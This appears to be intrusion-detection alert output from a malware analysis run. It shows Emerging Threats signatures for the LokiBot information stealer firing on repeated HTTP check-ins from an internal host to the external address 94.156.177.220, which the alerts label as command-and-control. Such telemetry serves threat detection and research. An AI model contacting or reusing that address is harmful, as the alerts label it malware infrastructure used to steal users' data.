2024-10-25T11:30:24.197759+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64241	94.156.177.220	80	TCP
2024-10-25T11:30:25.471211+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64242	94.156.177.220	80	TCP
2024-10-25T11:30:26.585470+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64243	94.156.177.220	80	TCP
2024-10-25T11:30:27.719981+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64244	94.156.177.220	80	TCP
2024-10-25T11:30:29.297651+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64245	94.156.177.220	80	TCP
2024-10-25T11:30:30.435133+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64246	94.156.177.220	80	TCP
2024-10-25T11:30:31.558444+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64247	94.156.177.220	80	TCP
2024-10-25T11:30:32.702432+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64248	94.156.177.220	80	TCP
2024-10-25T11:30:33.859385+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64249	94.156.177.220	80	TCP
2024-10-25T11:30:34.998099+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64250	94.156.177.220	80	TCP
2024-10-25T11:30:36.108883+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64251	94.156.177.220	80	TCP
2024-10-25T11:30:37.259328+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64252	94.156.177.220	80	TCP
2024-10-25T11:30:38.392292+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64253	94.156.177.220	80	TCP
2024-10-25T11:30:39.531711+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64254	94.156.177.220	80	TCP
2024-10-25T11:30:40.661278+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64255	94.156.177.220	80	TCP
2024-10-25T11:30:41.782183+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64256	94.156.177.220	80	TCP
2024-10-25T11:30:42.958639+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64257	94.156.177.220	80	TCP
2024-10-25T11:30:44.090835+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64258	94.156.177.220	80	TCP
2024-10-25T11:30:45.232719+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64259	94.156.177.220	80	TCP
2024-10-25T11:30:46.403777+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64260	94.156.177.220	80	TCP
2024-10-25T11:30:47.528668+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64261	94.156.177.220	80	TCP
2024-10-25T11:30:48.674432+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64262	94.156.177.220	80	TCP
2024-10-25T11:30:49.836930+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64263	94.156.177.220	80	TCP
2024-10-25T11:30:50.990800+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64264	94.156.177.220	80	TCP
2024-10-25T11:30:52.163502+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64265	94.156.177.220	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T11:28:48.526456+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49699	94.156.177.220	80	TCP
2024-10-25T11:28:49.651298+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49700	94.156.177.220	80	TCP
2024-10-25T11:28:50.712196+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49701	94.156.177.220	80	TCP
2024-10-25T11:28:52.217576+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49703	94.156.177.220	80	TCP
2024-10-25T11:28:53.615196+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49704	94.156.177.220	80	TCP
2024-10-25T11:28:54.898490+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49705	94.156.177.220	80	TCP
2024-10-25T11:28:56.017260+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49706	94.156.177.220	80	TCP
2024-10-25T11:28:57.125135+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49707	94.156.177.220	80	TCP
2024-10-25T11:28:58.258304+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49708	94.156.177.220	80	TCP
2024-10-25T11:28:59.390884+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49709	94.156.177.220	80	TCP
2024-10-25T11:29:00.530239+0200	2021641	1	A Network Trojan was detected	192.168.2.18	49710	94.156.177.220	80	TCP
2024-10-25T11:29:01.681309+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64167	94.156.177.220	80	TCP
2024-10-25T11:29:02.822243+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64168	94.156.177.220	80	TCP
2024-10-25T11:29:03.983922+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64169	94.156.177.220	80	TCP
2024-10-25T11:29:05.122017+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64170	94.156.177.220	80	TCP
2024-10-25T11:29:06.430963+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64171	94.156.177.220	80	TCP
2024-10-25T11:29:07.550024+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64172	94.156.177.220	80	TCP
2024-10-25T11:29:08.684720+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64173	94.156.177.220	80	TCP
2024-10-25T11:29:09.814451+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64174	94.156.177.220	80	TCP
2024-10-25T11:29:10.949279+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64175	94.156.177.220	80	TCP
2024-10-25T11:29:12.081936+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64176	94.156.177.220	80	TCP
2024-10-25T11:29:13.223654+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64177	94.156.177.220	80	TCP
2024-10-25T11:29:14.340855+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64178	94.156.177.220	80	TCP
2024-10-25T11:29:15.464654+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64179	94.156.177.220	80	TCP
2024-10-25T11:29:16.633739+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64180	94.156.177.220	80	TCP
2024-10-25T11:29:17.750103+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64181	94.156.177.220	80	TCP
2024-10-25T11:29:18.913135+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64182	94.156.177.220	80	TCP
2024-10-25T11:29:20.023984+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64183	94.156.177.220	80	TCP
2024-10-25T11:29:21.158391+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64184	94.156.177.220	80	TCP
2024-10-25T11:29:22.318196+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64185	94.156.177.220	80	TCP
2024-10-25T11:29:23.422578+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64186	94.156.177.220	80	TCP
2024-10-25T11:29:24.535211+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64187	94.156.177.220	80	TCP
2024-10-25T11:29:25.670775+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64188	94.156.177.220	80	TCP
2024-10-25T11:29:26.793846+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64189	94.156.177.220	80	TCP
2024-10-25T11:29:27.935220+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64190	94.156.177.220	80	TCP
2024-10-25T11:29:29.054472+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64191	94.156.177.220	80	TCP
2024-10-25T11:29:30.177026+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64192	94.156.177.220	80	TCP
2024-10-25T11:29:31.301159+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64193	94.156.177.220	80	TCP
2024-10-25T11:29:32.403178+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64194	94.156.177.220	80	TCP
2024-10-25T11:29:33.723057+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64195	94.156.177.220	80	TCP
2024-10-25T11:29:34.874543+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64196	94.156.177.220	80	TCP
2024-10-25T11:29:35.995240+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64197	94.156.177.220	80	TCP
2024-10-25T11:29:37.269058+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64198	94.156.177.220	80	TCP
2024-10-25T11:29:38.397005+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64199	94.156.177.220	80	TCP
2024-10-25T11:29:39.536926+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64201	94.156.177.220	80	TCP
2024-10-25T11:29:40.654260+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64202	94.156.177.220	80	TCP
2024-10-25T11:29:41.790844+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64203	94.156.177.220	80	TCP
2024-10-25T11:29:42.941323+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64204	94.156.177.220	80	TCP
2024-10-25T11:29:44.078643+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64206	94.156.177.220	80	TCP
2024-10-25T11:29:45.213270+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64208	94.156.177.220	80	TCP
2024-10-25T11:29:46.330109+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64209	94.156.177.220	80	TCP
2024-10-25T11:29:47.482694+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64210	94.156.177.220	80	TCP
2024-10-25T11:29:48.605816+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64211	94.156.177.220	80	TCP
2024-10-25T11:29:49.798794+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64212	94.156.177.220	80	TCP
2024-10-25T11:29:50.934440+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64213	94.156.177.220	80	TCP
2024-10-25T11:29:52.064655+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64214	94.156.177.220	80	TCP
2024-10-25T11:29:53.204009+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64215	94.156.177.220	80	TCP
2024-10-25T11:29:54.349067+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64216	94.156.177.220	80	TCP
2024-10-25T11:29:55.463755+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64217	94.156.177.220	80	TCP
2024-10-25T11:29:56.583523+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64218	94.156.177.220	80	TCP
2024-10-25T11:29:57.714329+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64219	94.156.177.220	80	TCP
2024-10-25T11:29:58.866731+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64220	94.156.177.220	80	TCP
2024-10-25T11:29:59.980749+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64221	94.156.177.220	80	TCP
2024-10-25T11:30:01.127492+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64222	94.156.177.220	80	TCP
2024-10-25T11:30:02.258244+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64223	94.156.177.220	80	TCP
2024-10-25T11:30:03.396659+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64224	94.156.177.220	80	TCP
2024-10-25T11:30:04.577592+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64225	94.156.177.220	80	TCP
2024-10-25T11:30:05.709458+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64226	94.156.177.220	80	TCP
2024-10-25T11:30:06.831907+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64227	94.156.177.220	80	TCP
2024-10-25T11:30:07.961822+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64228	94.156.177.220	80	TCP
2024-10-25T11:30:09.105260+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64229	94.156.177.220	80	TCP
2024-10-25T11:30:10.731680+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64230	94.156.177.220	80	TCP
2024-10-25T11:30:11.866553+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64231	94.156.177.220	80	TCP
2024-10-25T11:30:12.989441+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64232	94.156.177.220	80	TCP
2024-10-25T11:30:14.159631+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64233	94.156.177.220	80	TCP
2024-10-25T11:30:15.291917+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64234	94.156.177.220	80	TCP
2024-10-25T11:30:16.452907+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64235	94.156.177.220	80	TCP
2024-10-25T11:30:17.572116+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64236	94.156.177.220	80	TCP
2024-10-25T11:30:18.689593+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64237	94.156.177.220	80	TCP
2024-10-25T11:30:19.821385+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64238	94.156.177.220	80	TCP
2024-10-25T11:30:20.946553+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64239	94.156.177.220	80	TCP
2024-10-25T11:30:22.069912+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64240	94.156.177.220	80	TCP
2024-10-25T11:30:23.211887+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64241	94.156.177.220	80	TCP
2024-10-25T11:30:24.373368+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64242	94.156.177.220	80	TCP
2024-10-25T11:30:25.629029+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64243	94.156.177.220	80	TCP
2024-10-25T11:30:26.738112+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64244	94.156.177.220	80	TCP
2024-10-25T11:30:27.879604+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64245	94.156.177.220	80	TCP
2024-10-25T11:30:29.462637+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64246	94.156.177.220	80	TCP
2024-10-25T11:30:30.594455+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64247	94.156.177.220	80	TCP
2024-10-25T11:30:31.721488+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64248	94.156.177.220	80	TCP
2024-10-25T11:30:32.864200+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64249	94.156.177.220	80	TCP
2024-10-25T11:30:34.018598+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64250	94.156.177.220	80	TCP
2024-10-25T11:30:35.149886+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64251	94.156.177.220	80	TCP
2024-10-25T11:30:36.273882+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64252	94.156.177.220	80	TCP
2024-10-25T11:30:37.412674+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64253	94.156.177.220	80	TCP
2024-10-25T11:30:38.567606+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64254	94.156.177.220	80	TCP
2024-10-25T11:30:39.698213+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64255	94.156.177.220	80	TCP
2024-10-25T11:30:40.821388+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64256	94.156.177.220	80	TCP
2024-10-25T11:30:41.962121+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64257	94.156.177.220	80	TCP
2024-10-25T11:30:43.125026+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64258	94.156.177.220	80	TCP
2024-10-25T11:30:44.259225+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64259	94.156.177.220	80	TCP
2024-10-25T11:30:45.411989+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64260	94.156.177.220	80	TCP
2024-10-25T11:30:46.568424+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64261	94.156.177.220	80	TCP
2024-10-25T11:30:47.708109+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64262	94.156.177.220	80	TCP
2024-10-25T11:30:48.826402+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64263	94.156.177.220	80	TCP
2024-10-25T11:30:49.990988+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64264	94.156.177.220	80	TCP
2024-10-25T11:30:51.141273+0200	2021641	1	A Network Trojan was detected	192.168.2.18	64265	94.156.177.220	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T11:28:48.526456+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49699	94.156.177.220	80	TCP
2024-10-25T11:28:49.651298+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49700	94.156.177.220	80	TCP
2024-10-25T11:28:50.712196+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49701	94.156.177.220	80	TCP
2024-10-25T11:28:52.217576+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49703	94.156.177.220	80	TCP
2024-10-25T11:28:53.615196+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49704	94.156.177.220	80	TCP
2024-10-25T11:28:54.898490+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49705	94.156.177.220	80	TCP
2024-10-25T11:28:56.017260+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49706	94.156.177.220	80	TCP
2024-10-25T11:28:57.125135+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49707	94.156.177.220	80	TCP
2024-10-25T11:28:58.258304+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49708	94.156.177.220	80	TCP
2024-10-25T11:28:59.390884+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49709	94.156.177.220	80	TCP
2024-10-25T11:29:00.530239+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	49710	94.156.177.220	80	TCP
2024-10-25T11:29:01.681309+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64167	94.156.177.220	80	TCP
2024-10-25T11:29:02.822243+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64168	94.156.177.220	80	TCP
2024-10-25T11:29:03.983922+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64169	94.156.177.220	80	TCP
2024-10-25T11:29:05.122017+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64170	94.156.177.220	80	TCP
2024-10-25T11:29:06.430963+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64171	94.156.177.220	80	TCP
2024-10-25T11:29:07.550024+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64172	94.156.177.220	80	TCP
2024-10-25T11:29:08.684720+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64173	94.156.177.220	80	TCP
2024-10-25T11:29:09.814451+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64174	94.156.177.220	80	TCP
2024-10-25T11:29:10.949279+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64175	94.156.177.220	80	TCP
2024-10-25T11:29:12.081936+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64176	94.156.177.220	80	TCP
2024-10-25T11:29:13.223654+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64177	94.156.177.220	80	TCP
2024-10-25T11:29:14.340855+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64178	94.156.177.220	80	TCP
2024-10-25T11:29:15.464654+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64179	94.156.177.220	80	TCP
2024-10-25T11:29:16.633739+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64180	94.156.177.220	80	TCP
2024-10-25T11:29:17.750103+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64181	94.156.177.220	80	TCP
2024-10-25T11:29:18.913135+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64182	94.156.177.220	80	TCP
2024-10-25T11:29:20.023984+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64183	94.156.177.220	80	TCP
2024-10-25T11:29:21.158391+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64184	94.156.177.220	80	TCP
2024-10-25T11:29:22.318196+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64185	94.156.177.220	80	TCP
2024-10-25T11:29:23.422578+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64186	94.156.177.220	80	TCP
2024-10-25T11:29:24.535211+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64187	94.156.177.220	80	TCP
2024-10-25T11:29:25.670775+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64188	94.156.177.220	80	TCP
2024-10-25T11:29:26.793846+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64189	94.156.177.220	80	TCP
2024-10-25T11:29:27.935220+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64190	94.156.177.220	80	TCP
2024-10-25T11:29:29.054472+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64191	94.156.177.220	80	TCP
2024-10-25T11:29:30.177026+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64192	94.156.177.220	80	TCP
2024-10-25T11:29:31.301159+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64193	94.156.177.220	80	TCP
2024-10-25T11:29:32.403178+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64194	94.156.177.220	80	TCP
2024-10-25T11:29:33.723057+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64195	94.156.177.220	80	TCP
2024-10-25T11:29:34.874543+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64196	94.156.177.220	80	TCP
2024-10-25T11:29:35.995240+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64197	94.156.177.220	80	TCP
2024-10-25T11:29:37.269058+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64198	94.156.177.220	80	TCP
2024-10-25T11:29:38.397005+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64199	94.156.177.220	80	TCP
2024-10-25T11:29:39.536926+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64201	94.156.177.220	80	TCP
2024-10-25T11:29:40.654260+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64202	94.156.177.220	80	TCP
2024-10-25T11:29:41.790844+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64203	94.156.177.220	80	TCP
2024-10-25T11:29:42.941323+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64204	94.156.177.220	80	TCP
2024-10-25T11:29:44.078643+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64206	94.156.177.220	80	TCP
2024-10-25T11:29:45.213270+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64208	94.156.177.220	80	TCP
2024-10-25T11:29:46.330109+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64209	94.156.177.220	80	TCP
2024-10-25T11:29:47.482694+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64210	94.156.177.220	80	TCP
2024-10-25T11:29:48.605816+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64211	94.156.177.220	80	TCP
2024-10-25T11:29:49.798794+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64212	94.156.177.220	80	TCP
2024-10-25T11:29:50.934440+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64213	94.156.177.220	80	TCP
2024-10-25T11:29:52.064655+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64214	94.156.177.220	80	TCP
2024-10-25T11:29:53.204009+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64215	94.156.177.220	80	TCP
2024-10-25T11:29:54.349067+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64216	94.156.177.220	80	TCP
2024-10-25T11:29:55.463755+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64217	94.156.177.220	80	TCP
2024-10-25T11:29:56.583523+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64218	94.156.177.220	80	TCP
2024-10-25T11:29:57.714329+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64219	94.156.177.220	80	TCP
2024-10-25T11:29:58.866731+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64220	94.156.177.220	80	TCP
2024-10-25T11:29:59.980749+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64221	94.156.177.220	80	TCP
2024-10-25T11:30:01.127492+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64222	94.156.177.220	80	TCP
2024-10-25T11:30:02.258244+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64223	94.156.177.220	80	TCP
2024-10-25T11:30:03.396659+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64224	94.156.177.220	80	TCP
2024-10-25T11:30:04.577592+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64225	94.156.177.220	80	TCP
2024-10-25T11:30:05.709458+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64226	94.156.177.220	80	TCP
2024-10-25T11:30:06.831907+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64227	94.156.177.220	80	TCP
2024-10-25T11:30:07.961822+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64228	94.156.177.220	80	TCP
2024-10-25T11:30:09.105260+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64229	94.156.177.220	80	TCP
2024-10-25T11:30:10.731680+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64230	94.156.177.220	80	TCP
2024-10-25T11:30:11.866553+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64231	94.156.177.220	80	TCP
2024-10-25T11:30:12.989441+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64232	94.156.177.220	80	TCP
2024-10-25T11:30:14.159631+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64233	94.156.177.220	80	TCP
2024-10-25T11:30:15.291917+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64234	94.156.177.220	80	TCP
2024-10-25T11:30:16.452907+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64235	94.156.177.220	80	TCP
2024-10-25T11:30:17.572116+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64236	94.156.177.220	80	TCP
2024-10-25T11:30:18.689593+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64237	94.156.177.220	80	TCP
2024-10-25T11:30:19.821385+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64238	94.156.177.220	80	TCP
2024-10-25T11:30:20.946553+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64239	94.156.177.220	80	TCP
2024-10-25T11:30:22.069912+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64240	94.156.177.220	80	TCP
2024-10-25T11:30:23.211887+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64241	94.156.177.220	80	TCP
2024-10-25T11:30:24.373368+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64242	94.156.177.220	80	TCP
2024-10-25T11:30:25.629029+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64243	94.156.177.220	80	TCP
2024-10-25T11:30:26.738112+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64244	94.156.177.220	80	TCP
2024-10-25T11:30:27.879604+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64245	94.156.177.220	80	TCP
2024-10-25T11:30:29.462637+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64246	94.156.177.220	80	TCP
2024-10-25T11:30:30.594455+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64247	94.156.177.220	80	TCP
2024-10-25T11:30:31.721488+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64248	94.156.177.220	80	TCP
2024-10-25T11:30:32.864200+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64249	94.156.177.220	80	TCP
2024-10-25T11:30:34.018598+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64250	94.156.177.220	80	TCP
2024-10-25T11:30:35.149886+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64251	94.156.177.220	80	TCP
2024-10-25T11:30:36.273882+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64252	94.156.177.220	80	TCP
2024-10-25T11:30:37.412674+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64253	94.156.177.220	80	TCP
2024-10-25T11:30:38.567606+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64254	94.156.177.220	80	TCP
2024-10-25T11:30:39.698213+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64255	94.156.177.220	80	TCP
2024-10-25T11:30:40.821388+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64256	94.156.177.220	80	TCP
2024-10-25T11:30:41.962121+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64257	94.156.177.220	80	TCP
2024-10-25T11:30:43.125026+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64258	94.156.177.220	80	TCP
2024-10-25T11:30:44.259225+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64259	94.156.177.220	80	TCP
2024-10-25T11:30:45.411989+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64260	94.156.177.220	80	TCP
2024-10-25T11:30:46.568424+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64261	94.156.177.220	80	TCP
